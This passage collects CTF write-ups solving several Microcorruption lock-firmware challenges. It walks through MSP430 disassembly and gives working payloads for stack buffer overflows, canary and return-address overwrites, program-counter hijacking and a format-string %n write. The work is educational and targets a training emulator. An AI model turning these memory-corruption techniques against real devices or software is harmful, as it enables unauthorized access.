r15, r11 45fc: 073c jmp #0x460c 45fe: 1b53 inc r11 4600: 8f11 sxt r15 4602: 0f12 push r15 4604: 0312 push #0x0 4606: b012 9445 call #0x4594 460a: 2152 add #0x4, sp 460c: 6f4b mov.b @r11, r15 460e: 4f93 tst.b r15 4610: f623 jnz #0x45fe 4612: 3012 0a00 push #0xa 4616: 0312 push #0x0 4618: b012 9445 call #0x4594 461c: 2152 add #0x4, sp 461e: 0f43 clr r15 4620: 3b41 pop r11 4622: 3041 ret 4624 4624: 0d4f mov r15, r13 4626: 023c jmp #0x462c 4628: 1e53 inc r14 462a: 1d53 inc r13 462c: 6c4e mov.b @r14, r12 462e: cd4c 0000 mov.b r12, 0x0(r13) 4632: 4c93 tst.b r12 4634: f923 jnz #0x4628 4636: 3041 ret 4638 <_unexpected_> 4638: 0013 reti pc

Let’s try running the program with AAAAAAAAAAAAAAAAAAAA and see what happens…

We see the message Invalid Password Length: password too long. It appears as if they may have finally implemented proper bounds checking. I’m still a little suspicious. Let’s try a lot more A's (like 100 or so)…

In addition to the password length message, we notice a few more things:

More than 16 bytes were allowed to be input
We actually overwrote part of the data segment in memory (e.g. see [overwritten])
The user input is actually being copied to a higher location in memory

Since main() only calls login(), let’s dissect it and see how it works:

452c 452c: 3150 eeff add #0xffee, sp 4530: f140 ec00 1100 mov.b #0xec, 0x11(sp) 4536: 3f40 7c44 mov #0x447c "Enter the password to continue.", r15 453a: b012 f845 call #0x45f8 453e: 3f40 9c44 mov #0x449c "Remember: passwords are between 8 and 16 characters.", r15 4542: b012 f845 call #0x45f8 4546: 3e40 3f00 mov #0x3f, r14 454a: 3f40 0024 mov #0x2400, r15 454e: b012 e845 call #0x45e8 4552: 3e40 0024 mov #0x2400, r14 4556: 0f41 mov sp, r15 4558: b012 2446 call #0x4624 455c: 0f41 mov sp, r15 455e: b012 5244 call #0x4452 4562: 0f93 tst r15 4564: 0524 jz #0x4570 4566: b012 4644 call #0x4446 456a: 3f40 d144 mov #0x44d1 "Access granted.", r15 456e: 023c jmp #0x4574 4570: 3f40 e144 mov #0x44e1 "That password is not correct.", r15 4574: b012 f845 call #0x45f8 4578: f190 ec00 1100 cmp.b #0xec, 0x11(sp) 457e: 0624 jeq #0x458c 4580: 3f40 ff44 mov #0x44ff "Invalid Password Length: password too long.", r15 4584: b012 f845 call #0x45f8 4588: 3040 3c44 br #0x443c <__stop_progExec__> 458c: 3150 1200 add #0x12, sp 4590: 3041 ret

After prompting the user for input, strcpy() is eventually called and our user input is copied onto the stack. This is where things get a little interesting. After returning from the call to test_password_valid(), we eventually execute the jz #0x4570 instruction which will jump us to 0x4570, which will execute a puts() call on the string That password is not correct. Immediately after, we execute the instruction cmp.b #0xec, 0x11(sp), and then jeq #0x458c . That’s a really strange cmp instruction - the code is checking to see if the memory location after the buffer on the stack is 0xec, and if it isn’t, proceeds to call puts() on Invalid Password Length: password too long. Let’s set a break point on that cmp instruction and check out what the debugger looks like when it pauses. We’ll try using 10 A's this time, so as to not corrupt any memory…

It looks like the code is using a hard-coded stack canary (which lives at 0x43fd)! If the canary is over-written, the program uses this logic to assume that the length of the user input was too long. However, we can control what’s overwritten memory location of the stack canary - Great!

Right after the location of the stack canary in memory, we see another interesting pair of bytes: 0x3c44 (or when reversed, 0x44c3). Recall the memory values after the call to main():

4438 
4438:  b012 2c45      call	#0x452c 
443c <__stop_progExec__>
443c:  32d0 f000      bis	#0xf0, sr

As it turns out, 0x443c is the return address pushed onto the stack from the call to login() from main(), which is conveniently placed right after the value of the stack canary in memory! Sounds like we’re ready to craft our exploit. We’ll load up the buffer with A's, place the stack canary value 0x3c at the 18th byte offset, and we’ll overwrite the return address to 0x4566 (the call to unlock_door() from login())…

:+1: :beers:

Flag (mouse over to reveal)

4141414141414141414141414141414141ec6645

Microcorruption CTF Addis Ababa Write-up

2017-09-03T18:04:00+00:00

Summary:

This is a write-up of my solution to the Microcorruption CTF challenge “Addis Ababa” (LOCKIT PRO r b.03).

Right off the bat, in the description of the challenge, we get a hint dropped:

OVERVIEW
    - We have verified passwords can not be too long.
    - Usernames are printed back to the user for verification.
    - This lock is attached the the LockIT Pro HSM-1.

Let’s see exactly how the program is going to print back the usernames to the user…

0010 <__trap_interrupt> 0010: 3041 ret 4400 <__init_stack> 4400: 3140 da40 mov #0x40da, sp 4404 <__low_level_init> 4404: 1542 5c01 mov &0x015c, r5 4408: 75f3 and.b #-0x1, r5 440a: 35d0 085a bis #0x5a08, r5 440e <__do_copy_data> 440e: 3f40 0000 clr r15 4412: 0f93 tst r15 4414: 0724 jz #0x4424 <__do_clear_bss+0x0> 4416: 8245 5c01 mov r5, &0x015c 441a: 2f83 decd r15 441c: 9f4f f446 0024 mov 0x46f4(r15), 0x2400(r15) 4422: f923 jnz #0x4416 <__do_copy_data+0x8> 4424 <__do_clear_bss> 4424: 3f40 1400 mov #0x14, r15 4428: 0f93 tst r15 442a: 0624 jz #0x4438 442c: 8245 5c01 mov r5, &0x015c 4430: 1f83 dec r15 4432: cf43 0024 mov.b #0x0, 0x2400(r15) 4436: fa23 jnz #0x442c <__do_clear_bss+0x8> 4438

4438: 3150 eaff add #0xffea, sp 443c: 8143 0000 clr 0x0(sp) 4440: 3012 e644 push #0x44e6 "Login with username:password below to authenticate.\n" 4444: b012 c845 call #0x45c8 4448: b140 1b45 0000 mov #0x451b ">> ", 0x0(sp) 444e: b012 c845 call #0x45c8 4452: 2153 incd sp 4454: 3e40 1300 mov #0x13, r14 4458: 3f40 0024 mov #0x2400, r15 445c: b012 8c45 call #0x458c 4460: 0b41 mov sp, r11 4462: 2b53 incd r11 4464: 3e40 0024 mov #0x2400, r14 4468: 0f4b mov r11, r15 446a: b012 de46 call #0x46de 446e: 3f40 0024 mov #0x2400, r15 4472: b012 b044 call #0x44b0 4476: 814f 0000 mov r15, 0x0(sp) 447a: 0b12 push r11 447c: b012 c845 call #0x45c8 4480: 2153 incd sp 4482: 3f40 0a00 mov #0xa, r15 4486: b012 5045 call #0x4550 448a: 8193 0000 tst 0x0(sp) 448e: 0324 jz #0x4496 4490: b012 da44 call #0x44da 4494: 053c jmp #0x44a0 4496: 3012 1f45 push #0x451f "That entry is not valid." 449a: b012 c845 call #0x45c8 449e: 2153 incd sp 44a0: 0f43 clr r15 44a2: 3150 1600 add #0x16, sp 44a6 <__stop_progExec__> 44a6: 32d0 f000 bis #0xf0, sr 44aa: fd3f jmp #0x44a6 <__stop_progExec__+0x0> 44ac <__ctors_end> 44ac: 3040 f246 br #0x46f2 <_unexpected_> 44b0 44b0: 0412 push r4 44b2: 0441 mov sp, r4 44b4: 2453 incd r4 44b6: 2183 decd sp 44b8: c443 fcff mov.b #0x0, -0x4(r4) 44bc: 3e40 fcff mov #0xfffc, r14 44c0: 0e54 add r4, r14 44c2: 0e12 push r14 44c4: 0f12 push r15 44c6: 3012 7d00 push #0x7d 44ca: b012 3845 call #0x4538 44ce: 5f44 fcff mov.b -0x4(r4), r15 44d2: 8f11 sxt r15 44d4: 3152 add #0x8, sp 44d6: 3441 pop r4 44d8: 3041 ret 44da 44da: 3012 7f00 push #0x7f 44de: b012 3845 call #0x4538 44e2: 2153 incd sp 44e4: 3041 ret 44e6 .strings: 44e6: "Login with username:password below to authenticate.\n" 451b: ">> " 451f: "That entry is not valid." 4538 4538: 1e41 0200 mov 0x2(sp), r14 453c: 0212 push sr 453e: 0f4e mov r14, r15 4540: 8f10 swpb r15 4542: 024f mov r15, sr 4544: 32d0 0080 bis #0x8000, sr 4548: b012 1000 call #0x10 454c: 3241 pop sr 454e: 3041 ret 4550 4550: 2183 decd sp 4552: 0f12 push r15 4554: 0312 push #0x0 4556: 814f 0400 mov r15, 0x4(sp) 455a: b012 3845 call #0x4538 455e: 1f41 0400 mov 0x4(sp), r15 4562: 3150 0600 add #0x6, sp 4566: 3041 ret 4568 4568: 0412 push r4 456a: 0441 mov sp, r4 456c: 2453 incd r4 456e: 2183 decd sp 4570: 3f40 fcff mov #0xfffc, r15 4574: 0f54 add r4, r15 4576: 0f12 push r15 4578: 1312 push #0x1 457a: b012 3845 call #0x4538 457e: 5f44 fcff mov.b -0x4(r4), r15 4582: 8f11 sxt r15 4584: 3150 0600 add #0x6, sp 4588: 3441 pop r4 458a: 3041 ret 458c 458c: 0e12 push r14 458e: 0f12 push r15 4590: 2312 push #0x2 4592: b012 3845 call #0x4538 4596: 3150 0600 add #0x6, sp 459a: 3041 ret 459c 459c: 0b12 push r11 459e: 0b4f mov r15, r11 45a0: 073c jmp #0x45b0 45a2: 1b53 inc r11 45a4: 8f11 sxt r15 45a6: 0f12 push r15 45a8: 0312 push #0x0 45aa: b012 3845 call #0x4538 45ae: 2152 add #0x4, sp 45b0: 6f4b mov.b @r11, r15 45b2: 4f93 tst.b r15 45b4: f623 jnz #0x45a2 45b6: 3012 0a00 push #0xa 45ba: 0312 push #0x0 45bc: b012 3845 call #0x4538 45c0: 2152 add #0x4, sp 45c2: 0f43 clr r15 45c4: 3b41 pop r11 45c6: 3041 ret 45c8 45c8: 0b12 push r11 45ca: 0a12 push r10 45cc: 0912 push r9 45ce: 0812 push r8 45d0: 0712 push r7 45d2: 0412 push r4 45d4: 0441 mov sp, r4 45d6: 3450 0c00 add #0xc, r4 45da: 2183 decd sp 45dc: 1b44 0200 mov 0x2(r4), r11 45e0: 8441 f2ff mov sp, -0xe(r4) 45e4: 0f4b mov r11, r15 45e6: 0e43 clr r14 45e8: 0b3c jmp #0x4600 45ea: 1f53 inc r15 45ec: 7d90 2500 cmp.b #0x25, r13 45f0: 0720 jne #0x4600 45f2: 6d9f cmp.b @r15, r13 45f4: 0320 jne #0x45fc 45f6: 1f53 inc r15 45f8: 0d43 clr r13 45fa: 013c jmp #0x45fe 45fc: 1d43 mov #0x1, r13 45fe: 0e5d add r13, r14 4600: 6d4f mov.b @r15, r13 4602: 4d93 tst.b r13 4604: f223 jnz #0x45ea 4606: 0f4e mov r14, r15 4608: 0f5f add r15, r15 460a: 2f53 incd r15 460c: 018f sub r15, sp 460e: 0941 mov sp, r9 4610: 0c44 mov r4, r12 4612: 2c52 add #0x4, r12 4614: 0f41 mov sp, r15 4616: 0d43 clr r13 4618: 053c jmp #0x4624 461a: af4c 0000 mov @r12, 0x0(r15) 461e: 1d53 inc r13 4620: 2f53 incd r15 4622: 2c53 incd r12 4624: 0d9e cmp r14, r13 4626: f93b jl #0x461a 4628: 0a43 clr r10 462a: 3740 0900 mov #0x9, r7 462e: 4a3c jmp #0x46c4 4630: 084b mov r11, r8 4632: 1853 inc r8 4634: 7f90 2500 cmp.b #0x25, r15 4638: 0624 jeq #0x4646 463a: 1a53 inc r10 463c: 0b48 mov r8, r11 463e: 8f11 sxt r15 4640: b012 5045 call #0x4550 4644: 3f3c jmp #0x46c4 4646: 6e48 mov.b @r8, r14 4648: 4e9f cmp.b r15, r14 464a: 0620 jne #0x4658 464c: 1a53 inc r10 464e: 3f40 2500 mov #0x25, r15 4652: b012 5045 call #0x4550 4656: 333c jmp #0x46be 4658: 7e90 7300 cmp.b #0x73, r14 465c: 0b20 jne #0x4674 465e: 2b49 mov @r9, r11 4660: 053c jmp #0x466c 4662: 1a53 inc r10 4664: 1b53 inc r11 4666: 8f11 sxt r15 4668: b012 5045 call #0x4550 466c: 6f4b mov.b @r11, r15 466e: 4f93 tst.b r15 4670: f823 jnz #0x4662 4672: 253c jmp #0x46be 4674: 7e90 7800 cmp.b #0x78, r14 4678: 1c20 jne #0x46b2 467a: 2b49 mov @r9, r11 467c: 173c jmp #0x46ac 467e: 0f4b mov r11, r15 4680: 8f10 swpb r15 4682: 3ff0 ff00 and #0xff, r15 4686: 12c3 clrc 4688: 0f10 rrc r15 468a: 0f11 rra r15 468c: 0f11 rra r15 468e: 0f11 rra r15 4690: 1a53 inc r10 4692: 079f cmp r15, r7 4694: 0338 jl #0x469c 4696: 3f50 3000 add #0x30, r15 469a: 023c jmp #0x46a0 469c: 3f50 5700 add #0x57, r15 46a0: b012 5045 call #0x4550 46a4: 0b5b add r11, r11 46a6: 0b5b add r11, r11 46a8: 0b5b add r11, r11 46aa: 0b5b add r11, r11 46ac: 0b93 tst r11 46ae: e723 jnz #0x467e 46b0: 063c jmp #0x46be 46b2: 7e90 6e00 cmp.b #0x6e, r14 46b6: 0320 jne #0x46be 46b8: 2f49 mov @r9, r15 46ba: 8f4a 0000 mov r10, 0x0(r15) 46be: 2953 incd r9 46c0: 0b48 mov r8, r11 46c2: 1b53 inc r11 46c4: 6f4b mov.b @r11, r15 46c6: 4f93 tst.b r15 46c8: b323 jnz #0x4630 46ca: 1144 f2ff mov -0xe(r4), sp 46ce: 2153 incd sp 46d0: 3441 pop r4 46d2: 3741 pop r7 46d4: 3841 pop r8 46d6: 3941 pop r9 46d8: 3a41 pop r10 46da: 3b41 pop r11 46dc: 3041 ret 46de 46de: 0d4f mov r15, r13 46e0: 023c jmp #0x46e6 46e2: 1e53 inc r14 46e4: 1d53 inc r13 46e6: 6c4e mov.b @r14, r12 46e8: cd4c 0000 mov.b r12, 0x0(r13) 46ec: 4c93 tst.b r12 46ee: f923 jnz #0x46e2 46f0: 3041 ret 46f2 <_unexpected_> 46f2: 0013 reti pc

This code is significantly larger than the last one. However, it’s very clear that they changed one major thing: the use of printf() instead of puts().

Let’s just play around with the inputs and see what the program spits back out…

It looks like whatever input string we give it (e.g. AAA:BBB), the program will print back. All signs are pointing to a format string vulnerability, but let’s verify that’s actually the case by throwing a few %x's at it and seeing if we get anything interesting back…

Sweet! Upon inputting AA%x%x, we get the output AA4141, which means that we are reading two 1-byte hex-encoded parameters from the stack (i.e. the A's at the beginning of our input). I won’t spend time explaining how format string vulnerabilities work in this writeup, but you can check out scut’s whitepaper “Exploiting Format String Vulnerabilities” for a useful guide.

Now let’s try and see if we can use %n to write to a location in memory. I’ll use the input value BA%x%n to start with. Also, I’ll set a breakpoint at memory location 0x46b2 inside of login(), which is the cmp.b #0x6e, r14 instruction. This should allow us to break on the handling of the %n (n == 0x6e) format string parameter and lets us examine the registers and memory during execution.

As you can see, by using the %n parameter, we were able to overwrite the memory address 0x4142 (e.g. BA, the first two bytes of our input) with the value that was in register r10 (i.e. 0x2, the number of bytes written out by printf()). Great!

Now, let’s take a step back and see exactly what we need to do to unlock the door…

4472:  b012 b044      call	#0x44b0 
4476:  814f 0000      mov	r15, 0x0(sp)
447a:  0b12           push	r11
447c:  b012 c845      call	#0x45c8 
4480:  2153           incd	sp
4482:  3f40 0a00      mov	#0xa, r15
4486:  b012 5045      call	#0x4550 
448a:  8193 0000      tst	0x0(sp)
448e:  0324           jz	#0x4496 
4490:  b012 da44      call	#0x44da 
4494:  053c           jmp	#0x44a0 
4496:  3012 1f45      push	#0x451f "That entry is not valid."
449a:  b012 c845      call	#0x45c8 

Inside of main(), we can see that after the call to printf() returns, the instruction tst 0x0(sp) will execute. This instruction will test the sp register against 0x0, and will jump over the unlock_door() call if it’s zero. Let’s set a breakpoint this on instruction and input AAAA and see what the registers look like…

Looks like 0x40c4 has a 0x0 value and indeed prevents the call to unlock_door() from executing. I wonder what will happen if we use our newly weaponized format string vulnerability and write a non-zero value to the sp register (location 0x40c4)…

:+1: :beers:

Flag (mouse over to reveal)

c4402578256e

Microcorruption CTF Cusco Write-up

2017-08-31T20:11:00+00:00

Summary:

This is a write-up of my solution to the Microcorruption CTF challenge “Cusco” (LOCKIT PRO r b.02).

This version claims to fix the conditional flag overwrite issue that we exploited in the last challenge:

This is Software Revision 02. We have improved the security of the
lock by  removing a conditional  flag that could  accidentally get
set by passwords that were too long.

This indeed appears to be the case. Let’s check out the entire program and then see if we can figure out what’s going on:

0010 <__trap_interrupt> 0010: 3041 ret 4400 <__init_stack> 4400: 3140 0044 mov #0x4400, sp 4404 <__low_level_init> 4404: 1542 5c01 mov &0x015c, r5 4408: 75f3 and.b #-0x1, r5 440a: 35d0 085a bis #0x5a08, r5 440e <__do_copy_data> 440e: 3f40 0000 clr r15 4412: 0f93 tst r15 4414: 0724 jz #0x4424 <__do_clear_bss+0x0> 4416: 8245 5c01 mov r5, &0x015c 441a: 2f83 decd r15 441c: 9f4f d445 0024 mov 0x45d4(r15), 0x2400(r15) 4422: f923 jnz #0x4416 <__do_copy_data+0x8> 4424 <__do_clear_bss> 4424: 3f40 0000 clr r15 4428: 0f93 tst r15 442a: 0624 jz #0x4438 442c: 8245 5c01 mov r5, &0x015c 4430: 1f83 dec r15 4432: cf43 0024 mov.b #0x0, 0x2400(r15) 4436: fa23 jnz #0x442c <__do_clear_bss+0x8> 4438

4438: b012 0045 call #0x4500 443c <__stop_progExec__> 443c: 32d0 f000 bis #0xf0, sr 4440: fd3f jmp #0x443c <__stop_progExec__+0x0> 4442 <__ctors_end> 4442: 3040 d245 br #0x45d2 <_unexpected_> 4446 4446: 3012 7f00 push #0x7f 444a: b012 4245 call #0x4542 444e: 2153 incd sp 4450: 3041 ret 4452 4452: 0412 push r4 4454: 0441 mov sp, r4 4456: 2453 incd r4 4458: 2183 decd sp 445a: c443 fcff mov.b #0x0, -0x4(r4) 445e: 3e40 fcff mov #0xfffc, r14 4462: 0e54 add r4, r14 4464: 0e12 push r14 4466: 0f12 push r15 4468: 3012 7d00 push #0x7d 446c: b012 4245 call #0x4542 4470: 5f44 fcff mov.b -0x4(r4), r15 4474: 8f11 sxt r15 4476: 3152 add #0x8, sp 4478: 3441 pop r4 447a: 3041 ret 447c .strings: 447c: "Enter the password to continue." 449c: "Remember: passwords are between 8 and 16 characters." 44d1: "Access granted." 44e1: "That password is not correct." 44ff: "" 4500 4500: 3150 f0ff add #0xfff0, sp 4504: 3f40 7c44 mov #0x447c "Enter the password to continue.", r15 4508: b012 a645 call #0x45a6 450c: 3f40 9c44 mov #0x449c "Remember: passwords are between 8 and 16 characters.", r15 4510: b012 a645 call #0x45a6 4514: 3e40 3000 mov #0x30, r14 4518: 0f41 mov sp, r15 451a: b012 9645 call #0x4596 451e: 0f41 mov sp, r15 4520: b012 5244 call #0x4452 4524: 0f93 tst r15 4526: 0524 jz #0x4532 4528: b012 4644 call #0x4446 452c: 3f40 d144 mov #0x44d1 "Access granted.", r15 4530: 023c jmp #0x4536 4532: 3f40 e144 mov #0x44e1 "That password is not correct.", r15 4536: b012 a645 call #0x45a6 453a: 3150 1000 add #0x10, sp 453e: 3041 ret 4540 <__do_nothing> 4540: 3041 ret 4542 4542: 1e41 0200 mov 0x2(sp), r14 4546: 0212 push sr 4548: 0f4e mov r14, r15 454a: 8f10 swpb r15 454c: 024f mov r15, sr 454e: 32d0 0080 bis #0x8000, sr 4552: b012 1000 call #0x10 4556: 3241 pop sr 4558: 3041 ret 455a 455a: 2183 decd sp 455c: 0f12 push r15 455e: 0312 push #0x0 4560: 814f 0400 mov r15, 0x4(sp) 4564: b012 4245 call #0x4542 4568: 1f41 0400 mov 0x4(sp), r15 456c: 3150 0600 add #0x6, sp 4570: 3041 ret 4572 4572: 0412 push r4 4574: 0441 mov sp, r4 4576: 2453 incd r4 4578: 2183 decd sp 457a: 3f40 fcff mov #0xfffc, r15 457e: 0f54 add r4, r15 4580: 0f12 push r15 4582: 1312 push #0x1 4584: b012 4245 call #0x4542 4588: 5f44 fcff mov.b -0x4(r4), r15 458c: 8f11 sxt r15 458e: 3150 0600 add #0x6, sp 4592: 3441 pop r4 4594: 3041 ret 4596 4596: 0e12 push r14 4598: 0f12 push r15 459a: 2312 push #0x2 459c: b012 4245 call #0x4542 45a0: 3150 0600 add #0x6, sp 45a4: 3041 ret 45a6 45a6: 0b12 push r11 45a8: 0b4f mov r15, r11 45aa: 073c jmp #0x45ba 45ac: 1b53 inc r11 45ae: 8f11 sxt r15 45b0: 0f12 push r15 45b2: 0312 push #0x0 45b4: b012 4245 call #0x4542 45b8: 2152 add #0x4, sp 45ba: 6f4b mov.b @r11, r15 45bc: 4f93 tst.b r15 45be: f623 jnz #0x45ac 45c0: 3012 0a00 push #0xa 45c4: 0312 push #0x0 45c6: b012 4245 call #0x4542 45ca: 2152 add #0x4, sp 45cc: 0f43 clr r15 45ce: 3b41 pop r11 45d0: 3041 ret 45d2 <_unexpected_> 45d2: 0013 reti pc

So I’ll admit, this one took me a little longer to figure out. Let’s go through the basic steps I took to see where I got stumped:

main()

4438 
4438:  b012 0045      call	#0x4500 

All main() does is make a call to login(). Let’s follow login()…


 3150 f0ff      add	#0xfff0, sp
 3f40 7c44      mov	#0x447c "Enter the password to continue.", r15
 b012 a645      call	#0x45a6 
450c:  3f40 9c44      mov	#0x449c "Remember: passwords are between 8 and 16 characters.", r15
 b012 a645      call	#0x45a6 
 3e40 3000      mov	#0x30, r14
 0f41           mov	sp, r15
451a:  b012 9645      call	#0x4596 
451e:  0f41           mov	sp, r15
 b012 5244      call	#0x4452 
 0f93           tst	r15
 0524           jz	#0x4532 
 b012 4644      call	#0x4446 
452c:  3f40 d144      mov	#0x44d1 "Access granted.", r15
 023c           jmp	#0x4536 
 3f40 e144      mov	#0x44e1 "That password is not correct.", r15
 b012 a645      call	#0x45a6 
453a:  3150 1000      add	#0x10, sp
453e:  3041           ret

After a few calls to puts() to print out the password prompt message, the code makes a call to test_password_valid(). Upon returning, login() tests the value of r15 (at 0x4524). If r15 is not 0, we skip the jz instruction at 0x4526 and proceed to unlock_door(). Let’s pay attention to r15 while test_password_valid() is executing…

test_password_valid()


 0412           push	r4
 0441           mov	sp, r4
 2453           incd	r4
 2183           decd	sp
445a:  c443 fcff      mov.b	#0x0, -0x4(r4)
445e:  3e40 fcff      mov	#0xfffc, r14
 0e54           add	r4, r14
 0e12           push	r14
 0f12           push	r15
 3012 7d00      push	#0x7d
446c:  b012 4245      call	#0x4542 
 5f44 fcff      mov.b	-0x4(r4), r15
 8f11           sxt	r15
 3152           add	#0x8, sp
 3441           pop	r4
447a:  3041           ret

After shifting values inside of various registers/memory, the instruction mov.b -0x4(r4), r15 eventually sets a 0 value into r15. The instruction sxt r15 (sign extend) is executed on r15 (effectively doing nothing since the value is 0x0), and soon returns back into login(), where r15 is tested against 0. It does not appear that we have any influence over the memory address that’s moved into r15 :anguished:.

After racking my brain for a while, and continuously stepping through various parts of program, I noticed something interesting…

This version of the code isn’t storing our input at 0x2400 as it was originally, and instead is much closer to the program counter! Notice how close our user input (AAAAAAAAAA) is to pc. I wonder if we can overwrite parts of the program code! Let’s try a bunch of A's and see what happens…

Looks like we can! Another interesting thing to note, I tried to input about 200 or so A's, but only 48 were copied onto the stack. I suspect maybe during the copy onto the stack, __do_copy_data() is being invoked and we’re overwriting instructions as we’re in the middle of executing them? I wasn’t able to step the code to this level of precision so I’m not sure. However, this is sort of a moot point because of what happens as a result of inputting so many bytes…

We can control the pc register. Sweet! Now all we need to do is to figure out the byte offset to reach pc and figure out a suitable location to jump the execution to. After some experimenting with input strings of various lengths and keeping an eye on the pc register, we can see that the 17th and 18th byte of our input will overflow into the pc register. Let’s try overwriting pc with 0x4528, the call #0x4446 instruction inside login() which comes right after the jz instruction we were trying so hard to bypass…

:+1: :beers:

Flag (mouse over to reveal)

414141414141414141414141414141412845

Microcorruption CTF Hanoi Write-up

2017-08-30T23:17:00+00:00

Summary:

This is a write-up of my solution to the Microcorruption CTF challenge “Hanoi” (LOCKIT PRO r b.01).

Let’s jump right in…

4438 
4438:  b012 2045      call	#0x4520 
443c:  0f43           clr	r15

main() this time only makes a call to a function called login(). Let’s dissect login():

4520 4520: c243 1024 mov.b #0x0, &0x2410 4524: 3f40 7e44 mov #0x447e "Enter the password to continue.", r15 4528: b012 de45 call #0x45de 452c: 3f40 9e44 mov #0x449e "Remember: passwords are between 8 and 16 characters.", r15 4530: b012 de45 call #0x45de 4534: 3e40 1c00 mov #0x1c, r14 4538: 3f40 0024 mov #0x2400, r15 453c: b012 ce45 call #0x45ce 4540: 3f40 0024 mov #0x2400, r15 4544: b012 5444 call #0x4454 4548: 0f93 tst r15 454a: 0324 jz $+0x8 454c: f240 ea00 1024 mov.b #0xea, &0x2410 4552: 3f40 d344 mov #0x44d3 "Testing if password is valid.", r15 4556: b012 de45 call #0x45de 455a: f290 c700 1024 cmp.b #0xc7, &0x2410 4560: 0720 jne #0x4570 4562: 3f40 f144 mov #0x44f1 "Access granted.", r15 4566: b012 de45 call #0x45de 456a: b012 4844 call #0x4448 456e: 3041 ret 4570: 3f40 0145 mov #0x4501 "That password is not correct.", r15 4574: b012 de45 call #0x45de 4578: 3041 ret

Straight away, the instruction at 0x455a catches my eye, cmp.b #0xc7, &0x2410. Ultimately, this instruction will compare the byte located at memory address 0x2410, with the value 0xc7, and if they are equal, the door will unlock. Let’s set a breakpoint on the instruction and inspect the memory region around 0x2410 when execution pauses.

When being prompted for the password, I used AAAAAAAAAA. Check out the memory dump and notice where our input is (hint 0x2400). Notice that right after the 16th byte, the 17th byte will land in 0x2410. Great! Although the password prompt says to use a password of length 8 to 16 characters, let’s try using a 17-byte password and attempt a one-byte overflow into 0x2410 with 0xc7 and see if we can unlock the door…

Flag (mouse over to reveal)

41414141414141414141414141414141c7

Microcorruption CTF Reykjavik Write-up

2017-08-29T23:53:00+00:00

Summary:

This is a write-up of my solution to the Microcorruption CTF challenge “Reykjavik” (LOCKIT PRO r a.03).

The last two challenges were relatively straightforward and pretty easy to solve. This version promises “military-grade encryption”:

This is Software Revision 02. This release contains military-grade
encryption so users can be confident that the passwords they enter
can not be read from memory.   We apologize for making it too easy
for the password to be recovered on prior versions.  The engineers
responsible have been sacked.

Let’s see what they have up their sleeves. As always, let’s check out what’s going on in main():

4438

4438: 3e40 2045 mov #0x4520, r14 443c: 0f4e mov r14, r15 443e: 3e40 f800 mov #0xf8, r14 4442: 3f40 0024 mov #0x2400, r15 4446: b012 8644 call #0x4486 444a: b012 0024 call #0x2400 444e: 0f43 clr r15

As you can see, this version does not have a call to check_password(). Instead, the program makes a call to enc() and then makes another call to a mysterious portion of memory located at 0x2400. Interesting.

Another thing to note is that the memory located at 0x2400 doesn’t actually appear to contain anything interesting before the program is run (i.e. contains a bunch of zeros):

Let’s set a breakpoint on the main() function and see if we can figure out what’s going on:

Did you catch that? It looks like the portion of memory located at 0x2400 is being allocated before main() is called. Let’s step through the program as soon as it’s executed and keep an eye on 0x2400. Let’s also keep an eye on what instructions are being executed:

We can see that before we enter into main(), a call is made to __do_copy_data(). In this function, 0x7c bytes are being copied from 0x4538 into 0x2400. Interesting. Let’s continue on to enc() and observe what it does:

4486 4486: 0b12 push r11 4488: 0a12 push r10 448a: 0912 push r9 448c: 0812 push r8 448e: 0d43 clr r13 4490: cd4d 7c24 mov.b r13, 0x247c(r13) 4494: 1d53 inc r13 4496: 3d90 0001 cmp #0x100, r13 449a: fa23 jne #0x4490 449c: 3c40 7c24 mov #0x247c, r12 44a0: 0d43 clr r13 44a2: 0b4d mov r13, r11 44a4: 684c mov.b @r12, r8 44a6: 4a48 mov.b r8, r10 44a8: 0d5a add r10, r13 44aa: 0a4b mov r11, r10 44ac: 3af0 0f00 and #0xf, r10 44b0: 5a4a 7244 mov.b 0x4472(r10), r10 44b4: 8a11 sxt r10 44b6: 0d5a add r10, r13 44b8: 3df0 ff00 and #0xff, r13 44bc: 0a4d mov r13, r10 44be: 3a50 7c24 add #0x247c, r10 44c2: 694a mov.b @r10, r9 44c4: ca48 0000 mov.b r8, 0x0(r10) 44c8: cc49 0000 mov.b r9, 0x0(r12) 44cc: 1b53 inc r11 44ce: 1c53 inc r12 44d0: 3b90 0001 cmp #0x100, r11 44d4: e723 jne #0x44a4 44d6: 0b43 clr r11 44d8: 0c4b mov r11, r12 44da: 183c jmp #0x450c 44dc: 1c53 inc r12 44de: 3cf0 ff00 and #0xff, r12 44e2: 0a4c mov r12, r10 44e4: 3a50 7c24 add #0x247c, r10 44e8: 684a mov.b @r10, r8 44ea: 4b58 add.b r8, r11 44ec: 4b4b mov.b r11, r11 44ee: 0d4b mov r11, r13 44f0: 3d50 7c24 add #0x247c, r13 44f4: 694d mov.b @r13, r9 44f6: cd48 0000 mov.b r8, 0x0(r13) 44fa: ca49 0000 mov.b r9, 0x0(r10) 44fe: 695d add.b @r13, r9 4500: 4d49 mov.b r9, r13 4502: dfed 7c24 0000 xor.b 0x247c(r13), 0x0(r15) 4508: 1f53 inc r15 450a: 3e53 add #-0x1, r14 450c: 0e93 tst r14 450e: e623 jnz #0x44dc 4510: 3841 pop r8 4512: 3941 pop r9 4514: 3a41 pop r10 4516: 3b41 pop r11 4518: 3041 ret

So… we can see that this subroutine is doing a number of things. Let’s attempt to break down these instructions down slightly to get a sense of what’s going on:

Instructions 0x4490 to 0x449a are going to loop while loading bytes 0x00 to 0xff into the memory address starting at 0x0x247c.
Instructions 0x449c to 0x44d6 appears to be obfuscating the previously created 256 bytes using the string located at 0x4472, ThisIsSecureRight?
Instructions 0x44d8 to 0x4510 appear to be using the previously obfuscated byte string as an XOR key to the original data written at memory location 0x2400.

After returning back into main(), call #0x2400 is immediately executed. Stepping through this code reveals sensible instructions are being executed. It appears as though the bytes at memory location 0x2400 were originally obfuscated/encrypted, and the call to enc() ultimately deobfuscated/decrypted this memory for us. Sweet! Let’s dissect these bytes and disassemble them to see if we can see what instructions are going to be executed:

